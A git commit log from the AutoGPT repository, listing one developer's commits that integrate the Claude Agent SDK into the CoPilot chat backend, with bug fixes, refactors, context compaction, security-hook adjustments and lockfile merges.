Zamil Majdy	1926127ddd	fix(backend/chat): Fix bugs and remove dead code in SDK integration - Fix message accumulation bug: reset has_appended_assistant when creating new post-tool assistant message to prevent lost text deltas - Fix hardcoded model in anthropic_fallback.py: use config.model instead of hardcoded "claude-sonnet-4-20250514" - Fix _SDK_TOOL_RESULTS_DIR using hardcoded /root/ path: use expanduser - Remove unused create_strict_security_hooks (~75 lines) - Remove unused create_heartbeat/create_usage from response adapter - Remove unused RAW_TOOL_NAMES from tool_adapter - Extract _MAX_TOOL_ITERATIONS constant from magic number	2026-02-11 04:42:05 +04:00
Zamil Majdy	8b509e56de	refactor(backend/chat): Replace --resume with conversation context, add compaction and dedup - Remove broken --resume/session file approach (CLI v2.1.38 can't load >2 message session files) and delete session_file.py + tests - Embed prior conversation turns as <conversation_history> context in the user message for multi-turn memory - Add context compaction using shared compress_context() from prompt.py with LLM summarization + truncation fallback for long conversations - Reuse _build_system_prompt and _generate_session_title from parent service.py instead of duplicating (gains Langfuse prompt support) - Add has_conversation_history param to _build_system_prompt to avoid greeting on multi-turn conversations - Fix _SDK_TOOL_RESULTS_GLOB from hardcoded /root/ to expanduser ~/	2026-02-11 04:22:11 +04:00
Zamil Majdy	acb2d0bd1b	fix(backend/chat): Resolve symlinks in session file path for --resume The CLI resolves symlinks when computing its project directory (e.g. /tmp -> /private/tmp on macOS), so our session file writes must use the resolved path to match. Also adds cwd to ClaudeAgentOptions and debug logging for SDK messages.	2026-02-10 20:11:16 +04:00
Zamil Majdy	51aa369c80	fix(backend): Restore PyYAML cp38 wheel entries in poetry.lock Re-add Python 3.8 wheel entries for PyYAML that were dropped by poetry lock resolution, keeping the lockfile consistent with dev.	2026-02-10 20:06:45 +04:00
Zamil Majdy	6403ffe353	fix(backend/chat): Use --resume with session files for multi-turn conversations Replace broken AsyncIterable approach (CLI rejects assistant-type stdin messages) with JSONL session files written to the CLI's storage directory. This enables --resume to load full user+assistant context with turn-level compaction support for long conversations.	2026-02-10 18:46:33 +04:00
Zamil Majdy	c40a98ba3c	Merge branches 'feat/copitlot-claude-code' and 'dev' of github.com:Significant-Gravitas/AutoGPT into feat/copitlot-claude-code	2026-02-10 18:19:23 +04:00
Zamil Majdy	a31fc8b162	refactor(backend/chat): Use proper SDK types and in-memory conversation history Replace duck typing (class name checks, getattr) with isinstance() using SDK-exported dataclasses. Replace file-based --resume with AsyncIterable message injection for conversation history, eliminating disk I/O. Add 15 unit tests for the response adapter.	2026-02-10 18:17:00 +04:00
Zamil Majdy	0f2d1a6553	Merge branch 'dev' into feat/copitlot-claude-code	2026-02-10 17:23:06 +04:00
Zamil Majdy	87d817b83b	fix(backend/chat): Allow MCP-registered tools through security hook and fix title generation - Skip BLOCKED_TOOLS check for tools with mcp__copilot__ prefix since they are already sandboxed by tool_adapter (fixes Read tool being blocked) - Fall back to session.messages for title generation when message=None	2026-02-10 17:15:42 +04:00
Zamil Majdy	acf932bf4f	refactor(backend/chat): Move glob/os imports to top-level in SDK service	2026-02-10 16:57:11 +04:00
Zamil Majdy	f562d9a277	fix(backend/chat): Add Read tool for SDK oversized tool results The Claude Agent SDK saves tool results exceeding its token limit to files and instructs the agent to read them back with a Read tool. Our MCP server didn't have this tool, breaking the agent on large results like run_block output (117K+ chars). Changes: - Add a Read tool to the MCP server (restricted to /root/.claude/) - Register it in COPILOT_TOOL_NAMES so the SDK can use it - Add safety-net truncation at 500K chars for extreme cases - Clean up SDK tool-result files after each client session	2026-02-10 16:53:04 +04:00
Zamil Majdy	3c92a96504	fix(backend/chat): Publish StreamError before StreamFinish on error paths When run_ai_generation() or event_generator() encounter errors, they were only publishing StreamFinish without a preceding StreamError. The frontend treats finish-without-error as normal completion, leaving the user with an apparently stuck/empty response requiring a page refresh.	2026-02-10 15:49:23 +04:00
Zamil Majdy	8b8e1df739	fix(backend/chat): Auto-expire stale running tasks to unblock sessions Tasks stuck in "running" status beyond stream_timeout (300s) are now auto-marked as failed when looked up, preventing zombie tasks from blocking the session indefinitely.	2026-02-10 15:35:43 +04:00
Zamil Majdy	602a0a4fb1	fix(backend/chat): Strip tool call noise from conversation history context	2026-02-10 14:11:27 +04:00
Zamil Majdy	8d7d531ae0	refactor(backend/chat): Remove unused max_context_messages config	2026-02-10 13:57:33 +04:00
Zamil Majdy	43153a12e0	fix(backend/chat): Remove manual context truncation from SDK path, let SDK handle compaction	2026-02-10 13:52:49 +04:00
Zamil Majdy	587e11c60a	refactor(backend/chat): Extract MCP server name constants to avoid hardcoded strings	2026-02-10 12:12:08 +04:00
Zamil Majdy	57da545e02	Merge branch 'dev' into feat/copitlot-claude-code	2026-02-10 12:10:35 +04:00
Zamil Majdy	626980bf27	Merge branch 'dev' into feat/copitlot-claude-code	2026-02-09 19:26:52 +04:00
Swifty	e42b27af3c	Merge branch 'dev' into feat/copitlot-claude-code	2026-02-09 09:12:23 +01:00
Zamil Majdy	34face15d2	fix lock	2026-02-09 11:45:59 +04:00
Zamil Majdy	7d32c83f95	fix(backend/chat): Handle non-serializable SDK objects in tool result output	2026-02-09 10:59:50 +04:00
Zamil Majdy	6e2a45b84e	style(backend): Remove unused pytest import in execution_queue_test	2026-02-09 10:14:20 +04:00
Zamil Majdy	32f6532e9c	Merge branch 'dev' of github.com:Significant-Gravitas/AutoGPT into feat/copitlot-claude-code	2026-02-09 10:10:32 +04:00
Zamil Majdy	0bbe8a184d	Merge dev and resolve poetry.lock conflict	2026-02-08 19:40:17 +04:00
Zamil Majdy	7592deed63	fix(backend/chat): Address remaining PR review comments - Fix tool_call_id always being "sdk-call" by generating unique IDs per invocation - Fix validation using original tool_name instead of clean_name in security hooks - Fix duplicate StreamFinish in Anthropic fallback path - Fix ImportError fallback returning plain dict instead of re-raising - Extract _build_input_schema helper to deduplicate schema construction - Add else branch for unhandled SDK message types for observability - Truncate large tool results in conversation history to prevent context overflow	2026-02-08 19:39:10 +04:00
Zamil Majdy	b9c759ce4f	fix(backend/chat): Address additional PR review comments - Add terminal StreamFinish in adapt_sdk_stream if SDK ends without one - Sanitize error message in adapt_sdk_stream exception handler - Pass full JSON schema (type, properties, required) to tool decorator	2026-02-08 07:14:45 +04:00
Zamil Majdy	5efb80d47b	fix(backend/chat): Address PR review comments for Claude SDK integration - Add StreamFinish after ErrorMessage in response adapter - Fix str.replace to removeprefix in security hooks - Apply max_context_messages limit as safety guard in history formatting - Add empty prompt guard before sending to SDK - Sanitize error messages to avoid exposing internal details - Fix fire-and-forget asyncio.create_task by storing task reference - Fix tool_calls population on assistant messages - Rewrite Anthropic fallback to persist messages and merge consecutive roles - Only use ANTHROPIC_API_KEY for fallback (not OpenRouter keys) - Fix IndexError when tool result content list is empty	2026-02-06 13:25:10 +04:00
Zamil Majdy	b49d8e2cba	fix lock	2026-02-06 13:19:53 +04:00
Zamil Majdy	452544530d	feat(chat/sdk): Enable native SDK context compaction - Remove manual truncation in conversation history formatting - SDK's automatic compaction handles context limits intelligently - Add observability hooks: - PreCompact: Log when SDK triggers context compaction - PostToolUse: Log successful tool executions - PostToolUseFailure: Log and debug failed tool executions - Update config: increase max_context_messages (SDK handles compaction)	2026-02-06 12:44:48 +04:00
Zamil Majdy	32ee7e6cf8	fix(chat): Remove aggressive stale task detection The 60-second timeout was too aggressive and could incorrectly mark legitimate long-running tool calls as stale. Relying on Redis TTL (1 hour) for cleanup is sufficient and more reliable.	2026-02-06 11:45:54 +04:00
Zamil Majdy	670663c406	Merge dev and resolve poetry.lock conflict	2026-02-06 11:40:41 +04:00
Zamil Majdy	0dbe4cf51e	feat(backend/chat): Add Claude Agent SDK integration for CoPilot This PR adds Claude Agent SDK as the default backend for CoPilot chat completions, replacing the direct OpenAI API integration. Key changes: - Add Claude Agent SDK service layer with MCP tool adapter - Fix message persistence after tool calls (messages no longer disappear on refresh) - Add OpenRouter tracing for session title generation - Add security hooks for user context validation - Add Anthropic fallback when SDK is not available - Clean up excessive debug logging	2026-02-06 11:38:17 +04:00